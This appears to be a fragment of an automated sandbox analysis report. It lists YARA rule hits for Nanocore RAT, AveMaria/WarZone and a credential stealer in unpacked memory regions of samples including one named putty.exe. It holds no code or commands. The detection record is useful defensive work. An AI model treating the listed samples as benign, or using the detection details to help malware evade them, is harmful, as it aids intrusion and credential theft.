        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
